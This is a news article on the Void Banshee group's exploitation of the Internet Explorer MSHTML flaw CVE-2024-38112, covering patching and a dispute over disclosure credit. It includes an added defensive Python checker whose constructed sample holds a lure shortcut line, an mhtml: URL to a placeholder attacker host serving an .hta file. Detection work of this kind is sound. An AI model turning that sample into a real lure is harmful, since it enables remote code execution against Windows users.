Void Banshee, an APT group, has exploited a zero-day vulnerability in Internet Explorer (IE) to target Windows users, despite IE being retired. This significant threat has led to immediate action by Microsoft and security researchers.
Short summary of Void Banshee Exploits Zero-Day IE Vulnerability to Attack Windows Users:
- Zero-day vulnerability CVE-2024-38112 exploited by Void Banshee.
- Uses MSHTML in Internet Explorer to execute malicious files.
- Microsoft has issued a patch; users and admins urged to update promptly.
A sophisticated group known as Void Banshee has taken advantage of a zero-day vulnerability—tracked as CVE-2024-38112—in the MSHTML platform of Internet Explorer (IE) to target Windows users.
This vulnerability, which has now been patched by Microsoft, enabled attackers to execute remote code by exploiting a flaw in how IE handles Internet Shortcut files.
The vulnerability was first identified by Check Point researcher Haifei Li. “Check Point Research recently discovered that threat actors have been using novel tricks to lure Windows users for remote code execution.
Specifically, the attackers used special Windows Internet Shortcut files (.url extension name), which, when clicked, would call the retired Internet Explorer (IE) to visit the attacker-controlled URL,” Li explained.
These .url files appeared benign to most users but were specially crafted to abuse the MHTML: URI handler, thus forcing Internet Explorer to open the attacker-controlled website. Using IE, which is less secure than modern browsers like Chrome or Edge, provided attackers with a significant foothold to exploit the victim’s system.
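As an added defensive example (not code from the article, Check Point or Trend Micro), the following Python checker parses Windows Internet Shortcut (.url) files and flags the two traits described above: a URL field whose scheme is mhtml:, which hands the link to the MSHTML engine instead of the default browser, and a URL that references an HTML Application (.hta) file. The sample .url contents are constructed for the example and the host name is a placeholder; the function names are the example's own.

```python
import re

# Constructed sample .url files for the example (not real campaign artifacts).
BENIGN_URL_FILE = "[InternetShortcut]\r\nURL=https://example.com/report.pdf\r\n"
SUSPICIOUS_URL_FILE = (
    "[InternetShortcut]\r\n"
    # Placeholder host: the mhtml: scheme routes the link through MSHTML / IE.
    "URL=mhtml:http://attacker.invalid/lure!x:\\report.hta\r\n"
    "ShowCommand=7\r\n"
)

# URI schemes that cause a .url file to be opened by the MSHTML engine (IE)
# rather than by the user's default browser.
SUSPICIOUS_SCHEMES = {"mhtml"}


def parse_internet_shortcut(text: str) -> dict:
    """Return the key/value pairs of the [InternetShortcut] section.

    .url files are INI-style; keys are returned lower-cased so callers can
    look them up regardless of the casing the file author used.
    """
    fields = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "internetshortcut"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip().lower()] = value.strip()
    return fields


def url_scheme(url: str) -> str:
    """Scheme of a URL, lower-cased; empty string if there is no ':'."""
    return url.split(":", 1)[0].strip().lower() if ":" in url else ""


def assess_url_file(text: str) -> list:
    """Return a list of human-readable findings for one .url file (empty = nothing flagged)."""
    findings = []
    fields = parse_internet_shortcut(text)
    url = fields.get("url", "")
    if not url:
        findings.append("no URL field in [InternetShortcut] section")
        return findings
    scheme = url_scheme(url)
    if scheme in SUSPICIOUS_SCHEMES:
        findings.append(
            f"URL uses the {scheme}: handler, which opens the link with MSHTML (Internet Explorer)"
        )
    if re.search(r"\.hta\b", url, re.IGNORECASE):
        findings.append("URL references an HTML Application (.hta) file")
    return findings


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_URL_FILE), ("suspicious", SUSPICIOUS_URL_FILE)):
        print(name, "->", assess_url_file(sample) or ["no findings"])
```

The checker is deliberately conservative: a plain https: shortcut produces no findings, while an mhtml: shortcut is reported even when it does not point at an .hta file, since the scheme alone is what diverts the link into the retired browser.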
“The attacker gained significant advantages in exploiting the victim’s computer, although the computer is running the modern Windows 10/11 operating system,” Li added.
This scheme tricks victims into clicking links whose true nature is masked, with the victim clicking through successive pop-up warnings along the way. Seemingly ordinary files disguised as PDFs were actually malicious HTML Application (HTA) files that, when executed, allowed for remote code execution (RCE).
“For example, if the attacker has an IE zero-day exploit—which is much easier to find compared to Chrome/Edge—the attacker could attack the victim to gain remote code execution immediately,” Li noted.
Check Point’s investigation revealed that Void Banshee had been employing these malicious techniques since early January 2023, with the latest exploits observed as recently as May 13, 2024. This indicates a prolonged and potentially widespread campaign.
Microsoft was informed about the vulnerability in May 2024 and has since released a patch. Admins and users are strongly encouraged to apply the update without delay. The patch prevents URL files from triggering the MHTML: URI handler, mitigating the threat.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has prioritized this patch, adding CVE-2024-38112 to its Known Exploited Vulnerabilities (KEV) catalog and urging federal agencies to apply the fix by July 30.
This issue underscores a broader tension between researchers and large tech vendors like Microsoft regarding coordinated vulnerability disclosure.
While the update has been welcomed, Dustin Childs, head of threat awareness at Trend Micro’s Zero Day Initiative (ZDI), expressed frustration over a lack of recognition and communication from Microsoft.
“They’re saying what we reported was a defense-in-depth fix only, but they won’t tell us what that defense-in-depth fix really is,” Childs mentioned in an interview with The Register.
Trend Micro dubbed the cybercrime group behind these exploits Void Banshee and identified its targets in North America, Europe, and Southeast Asia. The primary malware used, Atlantida, aimed to steal sensitive information, particularly cryptocurrency wallets.
“These threat actors found a way to resurrect a zombie Internet Explorer. They were able to get Internet Explorer to then go out and download an info-stealer, and really they’re looking for cryptocurrency wallets,” Childs explained.
Another security expert, Mike Walters, Co-Founder of Action1, emphasized the potential reach and impact due to the widespread use of the MSHTML platform. “Given the extensive use of MSHTML across numerous applications, the potential reach and impact of this vulnerability are substantial, affecting a broad user base,” Walters warned.
Walters stressed that attackers could use CVE-2024-38112 for malicious purposes, such as “redirecting users to cloned banking or e-commerce sites to steal credentials and financial information, conducting corporate espionage, and causing widespread damage.”
Adding to the complex aftermath, Microsoft faced criticism for not crediting ZDI for the discovery. Initially, the advisory solely credited Check Point Research, with ZDI’s input being undervalued as a “defense-in-depth fix.”
This highlights ongoing issues in the vulnerability disclosure process, where researchers feel sidelined after reporting critical vulnerabilities.
Satnam Narang, Senior Staff Research Engineer at Tenable, pointed out that the complexity required for a successful attack is high, but this had not deterred attackers. “It could be exploited by an unauthenticated, remote attacker if they convince a potential target to open a malicious file,” Narang explained.
Despite the patch, this incident has reignited discussions on the responsibility of vendors in carefully handling and crediting security research. According to Childs, “Researchers are left in a lurch.
We don’t know what’s going on, and we’re often not credited properly. They spell our names wrong, and we’re giving them bugs for free.”
Furthermore, this event has drawn attention to other critical vulnerabilities, such as CVE-2024-38021, a Microsoft Office flaw that also requires urgent patching. Researchers at Morphisec highlighted its potential severity, emphasizing that it could lead to RCE without user interaction.
Morphisec researchers warn, “Given its zero-click nature (for trusted senders) and lack of authentication requirements, it should be considered critical.”
While Microsoft has patched CVE-2024-38112 and improved documentation crediting the involved parties, the broader industry challenge remains.
Transparency and coordinated disclosure are vital to maintaining trust and security in digital ecosystems. Enhanced communication between researchers and vendors is necessary to prevent similar issues in the future.
Ultimately, timely patch application by users and administrators and robust vulnerability management are critical to protecting against such sophisticated exploits. The ongoing collaboration and acknowledgment between security researchers and vendors are essential to fortifying defenses against evolving cyber threats.